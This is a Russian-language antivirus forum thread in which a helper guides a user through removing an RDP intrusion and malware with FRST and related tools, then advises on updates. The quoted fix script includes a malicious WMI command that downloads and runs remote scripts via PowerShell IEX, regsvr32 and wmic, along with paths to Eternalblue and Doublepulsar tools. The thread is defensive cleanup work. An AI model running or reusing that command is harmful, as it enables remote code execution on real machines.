Перейти к содержанию

кто-то установил RDP на пк


Рекомендуемые сообщения

Здравствуйте!

 

Проблему опишите, пожалуйста, подробнее, в чем именно выражается.

 

Скачайте AV block remover.
Распакуйте, запустите и следуйте инструкциям.
В результате работы утилиты появится отчёт AV_block_remove.log, прикрепите его к следующему сообщению.

После перезагрузки системы соберите новый CollectionLog Автологером.

Ссылка на сообщение
Поделиться на другие сайты

Заметил на диске С: папку "левую" (уже удалилась после AV block remover) там, что-то про rdp было. Посмотрел в администрировании в пользователях пользователь новый, его удалил. Попытался касперского установить free  - не устанавливается. Поэтому решил к профессионалам обратиться.

CollectionLog-2021.10.04-14.32.zip AV_block_remove.log

Ссылка на сообщение
Поделиться на другие сайты

Теперь понятно :)

 

Дополнительно:

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

 

Файл

Цитата

C:\Users\MLP\desktop\aa_v3.exe

вам известен? Это тоже программа удалённого управления AmmyAdmin.

Ссылка на сообщение
Поделиться на другие сайты

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Start::
    SystemRestore: On
    CreateRestorePoint:
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
    HKU\S-1-5-21-3223088090-4183115797-3109842715-1000\...\MountPoints2: {1a17073d-48c6-11e6-bdd0-364b50b7ef2d} - E:\SISetup.exe
    HKU\S-1-5-21-3223088090-4183115797-3109842715-1000\...\MountPoints2: {83d7d827-00ff-11e9-8be5-364b50b7ef2d} - E:\HiSuiteDownLoader.exe
    HKU\S-1-5-21-3223088090-4183115797-3109842715-1000\...\MountPoints2: {d0bcfb0f-2905-11e6-b90f-d8cb8ae0fe7d} - "I:\Install MegaFon Internet.exe"
    2021-01-04 10:43 - 2021-01-04 10:43 - 000000000 ___SH () C:\ProgramData\kz.exe
    2021-01-04 10:43 - 2021-01-04 10:43 - 000000000 ___SH () C:\ProgramData\lsass.exe
    2021-01-04 10:43 - 2021-01-04 10:43 - 000000000 ___SH () C:\ProgramData\lsass2.exe
    2021-01-04 10:43 - 2021-01-04 10:43 - 000000000 ___SH () C:\ProgramData\olly.exe
    2021-01-04 10:43 - 2021-01-04 10:43 - 000000000 ___SH () C:\ProgramData\script.exe
    2021-01-04 10:43 C:\Program Files (x86)\Zaxar
    2021-01-04 10:43 C:\Windows\boy.exe
    2021-01-04 10:43 C:\Windows\java.exe
    2021-01-04 10:43 C:\Windows\svchost.exe
    2021-01-04 10:43 C:\Windows\SysWOW64\Drivers\conhost.exe
    2021-01-04 10:43 C:\ProgramData\Driver Foundation Visions VHG
    WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
    WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"topx4\"",Filter="__EventFilter.Name=\"topx3\"::
    WMI:subscription\__EventFilter->topx3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 11000 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
    WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
    WMI:subscription\CommandLineEventConsumer->topx4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.dasxost.com:8080/power.txt')||regsvr32 /u /s /i:http://185.26.115.40:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://185.26.115.144:8220/s.xsl"]
    WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
    FirewallRules: [{24F5AB21-FD6B-4800-88E4-AF6A887D4F97}] => (Allow) C:\ProgramData\WindowsTask\MicrosoftHost.exe => Нет файла
    FirewallRules: [{0CC96BE1-E966-4ADE-B25B-80542EBADB5E}] => (Allow) C:\ProgramData\WindowsTask\AppModule.exe => Нет файла
    FirewallRules: [{31732C49-DC53-4085-B207-84E186F421FE}] => (Allow) C:\ProgramData\WindowsTask\AMD.exe => Нет файла
    FirewallRules: [{2DAAC257-3DF8-4919-BAED-196D7A532C9A}] => (Allow) C:\ProgramData\WindowsTask\MicrosoftHost.exe => Нет файла
    FirewallRules: [{7BDFDB76-754B-4D35-93DD-B98F12A34D38}] => (Allow) C:\ProgramData\WindowsTask\AppModule.exe => Нет файла
    FirewallRules: [{45C49E5A-2858-41B4-81B0-A089019CB5D4}] => (Allow) C:\ProgramData\WindowsTask\AMD.exe => Нет файла
    FirewallRules: [{68DC5587-D66F-4512-B002-9788A6A41F00}] => (Allow) C:\ProgramData\RealtekHD\taskhostw.exe => Нет файла
    FirewallRules: [{E57F64A7-AA55-4488-A5D8-ECDB4003D773}] => (Allow) C:\ProgramData\rundll\system.exe => Нет файла
    FirewallRules: [{A9AD11A1-29A5-4A5C-91EA-F4527C1C8D63}] => (Allow) C:\ProgramData\rundll\rundll.exe => Нет файла
    FirewallRules: [{D90D92D7-4D88-4B2B-A141-916A875E0B54}] => (Allow) C:\ProgramData\rundll\Doublepulsar-1.3.1.exe => Нет файла
    FirewallRules: [{C583528B-9C13-45EA-A6AD-EC7613BD082B}] => (Allow) C:\ProgramData\rundll\Eternalblue-2.2.0.exe => Нет файла
    FirewallRules: [{16B70809-10D7-48CB-A52D-01D477548D3E}] => (Allow) LPort=9494
    FirewallRules: [{23908275-A1BE-41BE-8688-7D75BC4550F5}] => (Allow) LPort=9393
    FirewallRules: [{1339B6CC-2275-4060-9113-2C024E11A1E8}] => (Allow) LPort=9494
    FirewallRules: [{5FED84C7-E9C8-42EF-94DC-60E9BE8AE912}] => (Allow) LPort=9393
    EmptyTemp:
    Reboot:
    End::

     

  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.


Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

Ссылка на сообщение
Поделиться на другие сайты

Если проблема решена, в завершение:

 

1. Выполните процедуру, описанную на этой странице.
Ссылку на результат анализа приведите здесь, пожалуйста.

 

2.

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.
 

3.

  • Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.

Ссылка на сообщение
Поделиться на другие сайты

------------------------------- [ Windows ] -------------------------------
Расширенная поддержка закончилась 14.01.2020, Ваша операционная система может быть уязвима к новым типам угроз
Internet Explorer 8.0.7601.17514 Внимание! Скачать обновления
^Используйте Средство устранения неполадок при проблемах установки^
Контроль учётных записей пользователя отключен (Уровень 1)
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
Автоматическое обновление отключено
Дата установки обновлений: 2018-04-30 09:14:55
------------------------------- [ HotFix ] --------------------------------
HotFix KB3177467 Внимание! Скачать обновления
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4539602 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
Microsoft .NET Framework 4.7.1 v.4.7.02558 Внимание! Скачать обновления
------------------------------ [ ArchAndFM ] ------------------------------
Total Commander v.8.51 Внимание! Скачать обновления
WinRAR 5.31 (64-разрядная) v.5.31.0 Внимание! Скачать обновления
------------------------------- [ Browser ] -------------------------------
Google Chrome v.94.0.4606.61 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - О Google Chrome!^
Opera Stable 65.0.3467.78 v.65.0.3467.78 Внимание! Скачать обновления
^Проверьте обновления через меню О программе!^
Opera Stable 79.0.4143.50 v.79.0.4143.50 Внимание! Скачать обновления
^Проверьте обновления через меню О программе!^
 

Особенно обратите внимание на Контроль учетных записей и постарайтесь установить все хотфиксы. Иначе рискуете снова заразиться.

 

Читайте Рекомендации после удаления вредоносного ПО

Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

  • Похожий контент

    • kamalov.e
      От kamalov.e
      Добрый день
      Ввели в работу профиль политики, для сетевой изоляции, который запрещает все сетевые соединения, кроме связи агента с KSC
      Необходимо проработать возможность подключения к заблокированным РМ через RDP и Удаленный помощник, можно через консоль Касперского с применением туннелирования через Network Agent. Просто открыть порт 3389 плохой вариант или тогда никак не будет работать?
    • nsgdima
      От nsgdima
      Компьютер у меня работает круглосуточно, в основном ради выделенного IP и возможности наблюдения за весьма пожилыми родственниками у меня и на другом адресе, где выделенного IP нет, камеры пробрасываются через меня на внутреннюю сеть дом.ру
      На компьютере поднят OpenServer и FileZilla, а так же RDP для удобства пользования ... Компьютер двухпроцессорный на 1366, два ксеона X5650, собран по дешевке на Авито и Али ... при нынешнем интернете очень удобно с древнего ноутбука на даче подключаться к нормальному домашнему компьютеру.
      Сегодня утром обнаружил что не запускаются некоторые программы, типа нет файла, начал смотреть и обнаружил запущенный параллельно сеанс, как будто дочка зашла ... закрыл его, восстановил тоталкоммандер и начал смотреть что происходит ... никаких лишних процессов запущенных не вижу, но большая часть файлов имеет вид "фото авто 001.jpg.w9lq64h4", при нажатии на такой файл открывается блокнот с текстом:
      "Ваши документы, базы данных и другие файлы были зашифрованы. Но не стоит переживать! Мы все расшифруем и вернем на свои места." и т.д.
      Компьютер пока не перезапускал, возможно поэтому система пока как то работает.
      Никаких госсекретов и оборонных данных у меня нет, но коллекцию музыки и фильмов жалко ... если есть возможность расшифровать это дело, помогите пожалуйста ...
      files.ZIP FRST.txt Addition.txt
    • Dag-M
      От Dag-M
      Здравствуйте.
       
      На компах предприятия стоят Kaspersky Endpoint Security для винды 11. Управляются сервером Kaspersky Security Center 13.
       
      Пытаюсь подключиться по RDP с внутренней сети на комп в инете, выходит ошибка "При подключении к удаленному ресурсу возникла проблема. Обратитесь за помощью к администратору сети".
      Отключение политик на сервере проблему не решает, так же, как и отключение политик на отдельном ПК. Решает проблему именно отключение защиты на ПК.
      Возможно ли решить этот вопрос через политики сервера?
       
        
      Выкладываю скрины правил сетевого экрана, если это как-то поможет решить проблему.
    • pacificae
      От pacificae
      Добрый день. Такая проблема... После обновления kaspersky endpoint security (с 11.6 до 11.9) появилась проблема - к хосту невозможно подключиться через ту же доменную учетную запись, что была. Пример - пользователь domen\ivanov, обновил касперский, domen\ivanov при подключении вылетает сразу же из RDP, при этом вроде бы подключившись на мгновение успешно. Однако другие учетные записи подключаться могут.
    • Александр_vgau
      От Александр_vgau
      Шифровальщик изменил файлы данных внутри сети на всех серверах и рабочих станциях с ОС Windows где был доступ по протоколу rdp или общие папки, часть бэкапов удалил.
      Антивирус не реагирует (все обновления установлены), наблюдали шифрование в режиме реального времени Антивирус спокойно наблюдал за шифрованием.
      Требования и файлы.rar Вирус.zip FRST.txt Addition.txt
×
×
  • Создать...